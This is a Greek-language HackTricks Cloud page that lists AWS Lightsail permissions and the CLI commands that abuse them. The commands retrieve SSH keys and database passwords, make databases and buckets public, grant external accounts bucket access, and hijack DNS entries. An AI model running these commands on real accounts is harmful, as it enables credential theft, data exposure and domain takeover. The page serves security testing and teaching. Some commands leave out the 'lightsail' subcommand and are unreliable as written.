AWS - Lightsail Privesc
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Δείτε τα subscription plans!
- Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
Lightsail
Για περισσότερες πληροφορίες σχετικά με το Lightsail δείτε:
Warning
Είναι σημαντικό να σημειωθεί ότι το Lightsail doesn’t use IAM roles belonging to the user αλλά σε έναν AWS managed account, οπότε δεν μπορείτε να καταχραστείτε αυτή την υπηρεσία για privesc. Ωστόσο, ευαίσθητα δεδομένα όπως code, API keys και database info μπορεί να βρεθούν σε αυτή την υπηρεσία.
lightsail:DownloadDefaultKeyPair
Αυτή η άδεια θα σας επιτρέψει να αποκτήσετε τα SSH keys για πρόσβαση στα instances:
aws lightsail download-default-key-pair
Potential Impact: Εντοπισμός ευαίσθητων πληροφοριών εντός των instances.
lightsail:GetInstanceAccessDetails
Αυτό το permission θα σας επιτρέψει να δημιουργήσετε SSH keys για να αποκτήσετε πρόσβαση στα instances:
aws lightsail get-instance-access-details --instance-name <instance_name>
Πιθανός Αντίκτυπος: Εύρεση ευαίσθητων πληροφοριών μέσα στα instances.
lightsail:CreateBucketAccessKey
Αυτή η άδεια θα σας επιτρέψει να αποκτήσετε ένα κλειδί για πρόσβαση στο bucket:
aws lightsail create-bucket-access-key --bucket-name <name>
Πιθανός Αντίκτυπος: Εύρεση ευαίσθητων πληροφοριών μέσα στο bucket.
lightsail:GetRelationalDatabaseMasterUserPassword
Αυτό το δικαίωμα θα σας επιτρέψει να αποκτήσετε τα διαπιστευτήρια για πρόσβαση στη βάση δεδομένων:
aws lightsail get-relational-database-master-user-password --relational-database-name <name>
Πιθανός Αντίκτυπος: Εντοπισμός ευαίσθητων πληροφοριών μέσα στη βάση δεδομένων.
lightsail:UpdateRelationalDatabase
Αυτό το δικαίωμα θα σας επιτρέψει να αλλάξετε τον κωδικό πρόσβασης για πρόσβαση στη βάση δεδομένων:
aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>
Αν η βάση δεδομένων δεν είναι δημόσια, θα μπορούσατε επίσης να την κάνετε δημόσια με αυτά τα δικαιώματα.
aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible
Πιθανός Αντίκτυπος: Εντοπισμός ευαίσθητων πληροφοριών μέσα στη βάση δεδομένων.
lightsail:OpenInstancePublicPorts
Αυτή η άδεια επιτρέπει το άνοιγμα θυρών στο Διαδίκτυο.
aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22
Πιθανός αντίκτυπος: Πρόσβαση σε ευαίσθητες θύρες.
lightsail:PutInstancePublicPorts
Αυτό το δικαίωμα επιτρέπει το άνοιγμα θυρών στο Διαδίκτυο. Σημειώστε ότι η κλήση θα κλείσει οποιαδήποτε θύρα είναι ανοιχτή και δεν αναφέρεται σε αυτή.
aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22
Πιθανός αντίκτυπος: Πρόσβαση σε ευαίσθητες θύρες.
lightsail:SetResourceAccessForBucket
Αυτή η άδεια επιτρέπει να δοθεί σε instances πρόσβαση σε ένα bucket χωρίς επιπλέον διαπιστευτήρια.
aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow
Potential Impact: Νέα πιθανή πρόσβαση σε buckets που περιέχουν ευαίσθητες πληροφορίες.
lightsail:UpdateBucket
Με αυτήν την άδεια, ένας επιτιθέμενος θα μπορούσε να παραχωρήσει στο δικό του AWS account πρόσβαση ανάγνωσης στα buckets ή ακόμη και να κάνει τα buckets δημόσια για όλους:
# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>
# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true
# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true
Potential Impact: Πιθανή νέα πρόσβαση σε buckets με ευαίσθητες πληροφορίες.
lightsail:UpdateContainerService
Με αυτά τα permissions, ένας attacker θα μπορούσε να χορηγήσει πρόσβαση σε private ECRs από την containers service
aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}
Πιθανές Επιπτώσεις: Λήψη ευαίσθητων πληροφοριών από ιδιωτικό ECR
lightsail:CreateDomainEntry
Ένας attacker με αυτήν την άδεια θα μπορούσε να δημιουργήσει subdomain και να το δείξει στη δική του IP address (subdomain takeover), ή να δημιουργήσει ένα SPF record που του επιτρέπει να spoof emails από το domain, ή ακόμα και να ορίσει το κύριο domain στη δική του IP address.
aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0
Πιθανός αντίκτυπος: Takeover a domain
lightsail:UpdateDomainEntry
Ένας attacker με αυτή την άδεια θα μπορούσε να δημιουργήσει ένα subdomain και να το δείξει στη δική του IP address (subdomain takeover), ή να δημιουργήσει μια SPF record που του επιτρέπει να spoof emails από το domain, ή ακόμα και να ορίσει το κύριο domain στην δική του IP address.
aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0
Πιθανός Αντίκτυπος: Κατάληψη ενός domain
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Δείτε τα subscription plans!
- Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
HackTricks Cloud

